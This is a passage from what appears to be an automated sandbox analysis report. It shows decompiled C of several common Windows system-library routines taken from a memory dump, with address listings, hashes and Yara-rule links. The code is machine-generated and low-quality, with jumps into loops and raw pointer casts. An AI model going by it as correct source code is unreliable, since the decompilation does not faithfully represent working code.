				_t89 = _t82 -  *0x49886b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E048B2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E049688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E048DAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x498b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x49884c0;
										if(_t69 >=  *0x49884c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04969063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0489922A(_t82);
							_t53 = E048B7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04968B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x49886c0; // 0x2607b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x49886b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x49886bc;
										_t72 = 0x49886b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04899240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x49886c4;
									_t72 = 0x49886c0;
									L18:
									E048C9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                        0x04899100
                                                        0x04899100
                                                        0x04899100
                                                        0x04899100
                                                        0x04899102
                                                        0x04899107
                                                        0x0489910c
                                                        0x04899110
                                                        0x04899115
                                                        0x04899136
                                                        0x04899143
                                                        0x048f37e4
                                                        0x048f37e4
                                                        0x04899149
                                                        0x0489914e
                                                        0x0489914e
                                                        0x04899117
                                                        0x0489911d
                                                        0x00000000
                                                        0x00000000
                                                        0x0489911f
                                                        0x04899125
                                                        0x00000000
                                                        0x04899151
                                                        0x04899158
                                                        0x0489915d
                                                        0x04899161
                                                        0x04899168
                                                        0x048f3715
                                                        0x00000000
                                                        0x0489916e
                                                        0x0489916e
                                                        0x04899175
                                                        0x04899177
                                                        0x0489917e
                                                        0x0489917f
                                                        0x04899182
                                                        0x04899182
                                                        0x04899187
                                                        0x04899187
                                                        0x0489918a
                                                        0x0489918d
                                                        0x0489918f
                                                        0x04899192
                                                        0x04899195
                                                        0x04899198
                                                        0x04899198
                                                        0x04899198
                                                        0x0489919a
                                                        0x00000000
                                                        0x00000000
                                                        0x048f371f
                                                        0x048f3721
                                                        0x048f3727
                                                        0x048f372f
                                                        0x048f3733
                                                        0x048f3735
                                                        0x048f3738
                                                        0x048f373b
                                                        0x048f373d
                                                        0x048f3740
                                                        0x00000000
                                                        0x00000000
                                                        0x048f3746
                                                        0x048f3749
                                                        0x00000000
                                                        0x00000000
                                                        0x048f374f
                                                        0x048f3751
                                                        0x00000000
                                                        0x00000000
                                                        0x048f3757
                                                        0x048f3759
                                                        0x048f375c
                                                        0x048f375c
                                                        0x048f375e
                                                        0x048f375e
                                                        0x048f3761
                                                        0x048f3764
                                                        0x00000000
                                                        0x00000000
                                                        0x048f3766
                                                        0x048f3768
                                                        0x048f37a3
                                                        0x048f37a3
                                                        0x048f37a5
                                                        0x048f37a7
                                                        0x048f37ad
                                                        0x048f37b0
                                                        0x048f37b2
                                                        0x048f37bc
                                                        0x048f37c2
                                                        0x048f37c2
                                                        0x048f37b2
                                                        0x04899187
                                                        0x04899187
                                                        0x0489918a
                                                        0x0489918d
                                                        0x0489918f
                                                        0x04899192
                                                        0x04899195
                                                        0x00000000
                                                        0x04899195
                                                        0x00000000
                                                        0x04899187
                                                        0x048f376a
                                                        0x048f376a
                                                        0x048f376c
                                                        0x048f376c
                                                        0x048f376f
                                                        0x048f3775
                                                        0x00000000
                                                        0x00000000
                                                        0x048f3777
                                                        0x048f3779
                                                        0x00000000
                                                        0x00000000
                                                        0x048f3782
                                                        0x048f3787
                                                        0x048f3789
                                                        0x048f3790
                                                        0x048f3790
                                                        0x048f378b
                                                        0x048f378b
                                                        0x048f378b
                                                        0x048f3792
                                                        0x048f3795
                                                        0x048f3795
                                                        0x048f3798
                                                        0x048f3798
                                                        0x048f379b
                                                        0x048f379b
                                                        0x048991a3
                                                        0x048991a9
                                                        0x048991b0
                                                        0x048991b4
                                                        0x048991b4
                                                        0x048991bb
                                                        0x048991c0
                                                        0x048991c5
                                                        0x048991c7
                                                        0x048f37da
                                                        0x048991cd
                                                        0x048991cd
                                                        0x048991cd
                                                        0x048991d2
                                                        0x048991d5
                                                        0x04899239
                                                        0x04899239
                                                        0x048991d7
                                                        0x048991db
                                                        0x048991e1
                                                        0x048991e7
                                                        0x048991fd
                                                        0x04899203
                                                        0x0489921e
                                                        0x04899223
                                                        0x00000000
                                                        0x04899223
                                                        0x04899205
                                                        0x04899208
                                                        0x0489920c
                                                        0x04899214
                                                        0x04899214
                                                        0x048991e9
                                                        0x048991e9
                                                        0x048991ee
                                                        0x048991f3
                                                        0x048991f3
                                                        0x048991f3
                                                        0x048991e7
                                                        0x00000000
                                                        0x048991db
                                                        0x04899187
                                                        0x04899168

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a70330e9cee7b3bd1ad2c9a7928128c9b3db3a786ceb7fba4ed28b024370f34
                                                        • Instruction ID: 6128deda366901e5f0e7e774cfc875cffac8d592d8c2c18068a67e53f0de660f
                                                        • Opcode Fuzzy Hash: 9a70330e9cee7b3bd1ad2c9a7928128c9b3db3a786ceb7fba4ed28b024370f34
                                                        • Instruction Fuzzy Hash: 14319FB1A05A45DFEF25EF68C4487ACBBF1BB48354F188A5DC415A7340D378BD808752
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048B0050, Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 53%
                                                        			E048B0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x498d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E048C9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E048DB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04968A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E048C9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x498b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                        0x048b0055
                                                        0x048b005d
                                                        0x048b0062
                                                        0x048b006c
                                                        0x048b006f
                                                        0x048b0074
                                                        0x048b007a
                                                        0x048b007a
                                                        0x048b0080
                                                        0x048b0080
                                                        0x048b0087
                                                        0x048b008d
                                                        0x048b008f
                                                        0x048b0093
                                                        0x048b0095
                                                        0x048b009b
                                                        0x048b00f8
                                                        0x048b00fb
                                                        0x048b00fc
                                                        0x048b00ff
                                                        0x048b0108
                                                        0x048b0108
                                                        0x048b00a2
                                                        0x048b00a6
                                                        0x048b00b3
                                                        0x048b00bc
                                                        0x048b00c5
                                                        0x048b00ca
                                                        0x048fc01e
                                                        0x00000000
                                                        0x00000000
                                                        0x048fc02d
                                                        0x048b00d5
                                                        0x048b00d9
                                                        0x048fc03d
                                                        0x048fc046
                                                        0x048fc046
                                                        0x048b00df
                                                        0x048b00e2
                                                        0x048b00ea
                                                        0x048b00ef
                                                        0x048b00f2
                                                        0x048b00f6
                                                        0x048b0111
                                                        0x048b0117
                                                        0x048b0117
                                                        0x00000000
                                                        0x048b00f6
                                                        0x048b00d0
                                                        0x048b00d0
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5169f634565551038dd97612665290d3661b06966149557a42e43ff876ef20c8
                                                        • Instruction ID: 8f6df5e14ac46373f2fef6556574b8fb44b984462dcd271a4641b9ebf912834a
                                                        • Opcode Fuzzy Hash: 5169f634565551038dd97612665290d3661b06966149557a42e43ff876ef20c8
                                                        • Instruction Fuzzy Hash: 28316931601A08CFD725DF28C840B97B3E5FB89718F144A6DE996C7B90EB75B802CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04916C0A, Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E04916C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E048B7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4987b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L048B4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E048DF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E048B7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E048D9AE0();
						_t23 = L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                        0x04916c0a
                                                        0x04916c0f
                                                        0x04916c10
                                                        0x04916c13
                                                        0x04916c15
                                                        0x04916c19
                                                        0x04916c1c
                                                        0x04916c21
                                                        0x04916c28
                                                        0x04916c3a
                                                        0x04916c2a
                                                        0x04916c33
                                                        0x04916c33
                                                        0x04916c3f
                                                        0x04916c48
                                                        0x04916c4d
                                                        0x04916c60
                                                        0x04916c65
                                                        0x04916c69
                                                        0x04916c73
                                                        0x04916c79
                                                        0x04916c7f
                                                        0x04916c86
                                                        0x04916c90
                                                        0x04916c94
                                                        0x04916ca6
                                                        0x04916cb2
                                                        0x04916cbd
                                                        0x04916cbd
                                                        0x04916cc3
                                                        0x04916cc7
                                                        0x04916ccb
                                                        0x04916cd0
                                                        0x04916cd1
                                                        0x04916ce2
                                                        0x04916ce2
                                                        0x04916c69
                                                        0x04916ced

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 574e5b4f0a8acfcfa02bebbc68ae1898f5f9f5c687fd186c609f20de028bb572
                                                        • Instruction ID: 17f95d959cddf8a72961e9f2eb5be4c1a18f446152e3dddfa10607041cd7c3b7
                                                        • Opcode Fuzzy Hash: 574e5b4f0a8acfcfa02bebbc68ae1898f5f9f5c687fd186c609f20de028bb572
                                                        • Instruction Fuzzy Hash: B3219AB1A00688AFD715DB6CD980F6AB7B8FF48744F14056AF944CB7A1E634ED10CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D90AF, Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E048D90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E048ED4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E048CE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L048B4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E048DF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E048CA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                        0x048d90af
                                                        0x048d90b8
                                                        0x048d90bb
                                                        0x048d90bf
                                                        0x048d90c2
                                                        0x048d90c2
                                                        0x048d90c8
                                                        0x048d90cb
                                                        0x048d90cd
                                                        0x049114d7
                                                        0x049114eb
                                                        0x049114eb
                                                        0x00000000
                                                        0x049114eb
                                                        0x049114db
                                                        0x049114e6
                                                        0x00000000
                                                        0x049114f2
                                                        0x049114e8
                                                        0x00000000
                                                        0x049114e8
                                                        0x048d90d8
                                                        0x048d90da
                                                        0x048d90dd
                                                        0x048d90e5
                                                        0x00000000
                                                        0x048d9139
                                                        0x048d90fa
                                                        0x048d90fe
                                                        0x048d9142
                                                        0x00000000
                                                        0x048d9142
                                                        0x048d9104
                                                        0x048d9107
                                                        0x048d910b
                                                        0x048d9110
                                                        0x048d9118
                                                        0x048d9147
                                                        0x048d9148
                                                        0x048d914f
                                                        0x048d9150
                                                        0x048d9151
                                                        0x048d9152
                                                        0x048d9156
                                                        0x048d915d
                                                        0x048d9160
                                                        0x048d9168
                                                        0x048d916c
                                                        0x048d91bc
                                                        0x048d91be
                                                        0x00000000
                                                        0x048d91be
                                                        0x048d916e
                                                        0x048d9173
                                                        0x048d9176
                                                        0x00000000
                                                        0x00000000
                                                        0x048d917c
                                                        0x048d9180
                                                        0x048d91b5
                                                        0x00000000
                                                        0x048d91b5
                                                        0x048d9182
                                                        0x048d9185
                                                        0x048d9189
                                                        0x00000000
                                                        0x00000000
                                                        0x048d918e
                                                        0x048d9190
                                                        0x048d9198
                                                        0x00000000
                                                        0x00000000
                                                        0x048d91a0
                                                        0x00000000
                                                        0x048d91ad
                                                        0x048d91ad
                                                        0x048d91b0
                                                        0x048d91b1
                                                        0x00000000
                                                        0x048d9185
                                                        0x048d911a
                                                        0x048d911c
                                                        0x048d911f
                                                        0x048d9125
                                                        0x048d9127
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                        • Instruction ID: 5e1b86ce61b81e2d8410b1057c83583fae4430de9412cbb9789d0f3553e79799
                                                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                        • Instruction Fuzzy Hash: 172180B1A01209EFEB20DF59C845AAAF7F8EB48714F14897AE949E7250D374FD00CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C3B7A, Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E048C3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x49884c4; // 0x0
				_v12 = 1;
				_v8 =  *0x49884c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L048B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x49884c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E048DAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E048DFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x49884c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x49884c4; // 0x0
					L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                        0x048c3b89
                                                        0x048c3b96
                                                        0x048c3ba1
                                                        0x048c3bab
                                                        0x048c3bb5
                                                        0x048c3bb9
                                                        0x04906298
                                                        0x048c3bbf
                                                        0x048c3bc2
                                                        0x048c3bc3
                                                        0x048c3bc9
                                                        0x048c3bca
                                                        0x048c3bcc
                                                        0x048c3bcd
                                                        0x048c3bd4
                                                        0x048c3bd6
                                                        0x048c3bdb
                                                        0x048c3bea
                                                        0x048c3bf7
                                                        0x048c3bfb
                                                        0x048c3bff
                                                        0x048c3c09
                                                        0x048c3c0a
                                                        0x048c3c0b
                                                        0x048c3c0f
                                                        0x048c3c14
                                                        0x048c3c18
                                                        0x048c3c18
                                                        0x048c3bfb
                                                        0x048c3c1b
                                                        0x048c3c30
                                                        0x048c3c30
                                                        0x048c3c3d

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05d6dcb42d0b085dc0aa2e8b961a420c104797a2569d4503184bb43375a79adb
                                                        • Instruction ID: 6f49d9f72db59f54e2daf9ee5c56c5169209d672f491a1aef13234d0cd9b8f28
                                                        • Opcode Fuzzy Hash: 05d6dcb42d0b085dc0aa2e8b961a420c104797a2569d4503184bb43375a79adb
                                                        • Instruction Fuzzy Hash: 0121AC72A00108AFD700DF58CD81B6ABBADFB44708F254568E908EB251D371ED129BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04916CF0, Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E04916CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E048B7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E048B7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4875c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E048CF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E048CF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04917016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L048B2400( &_v52);
								}
								_t21 = L048B2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                        0x04916cfb
                                                        0x04916d00
                                                        0x04916d02
                                                        0x04916d06
                                                        0x04916d0a
                                                        0x04916d0e
                                                        0x04916d19
                                                        0x04916d2b
                                                        0x04916d1b
                                                        0x04916d24
                                                        0x04916d24
                                                        0x04916d33
                                                        0x04916d39
                                                        0x04916d46
                                                        0x04916d4f
                                                        0x04916d61
                                                        0x04916d51
                                                        0x04916d5a
                                                        0x04916d5a
                                                        0x04916d69
                                                        0x04916d6b
                                                        0x04916d6d
                                                        0x04916d6f
                                                        0x04916d6f
                                                        0x04916d74
                                                        0x04916d79
                                                        0x04916d7a
                                                        0x04916d7f
                                                        0x04916d82
                                                        0x04916d88
                                                        0x04916d89
                                                        0x04916d90
                                                        0x04916d94
                                                        0x04916da7
                                                        0x04916db1
                                                        0x04916db1
                                                        0x04916dbb
                                                        0x04916dbb
                                                        0x04916d90
                                                        0x04916d69
                                                        0x04916d46
                                                        0x04916dc6

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f65274a77bf8ac8fed11fd5bd8f83765317799b5f40a62aed84f18ac6a291c04
                                                        • Instruction ID: f36f82a55cf202479401e4113e169d219d084ea66177bbd7c12995663db52a89
                                                        • Opcode Fuzzy Hash: f65274a77bf8ac8fed11fd5bd8f83765317799b5f40a62aed84f18ac6a291c04
                                                        • Instruction Fuzzy Hash: BD21D3729003489FD711DF68CD44BA7B7ECAF81754F04096AB980C7260E734F908C6A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0496070D, Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E0496070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

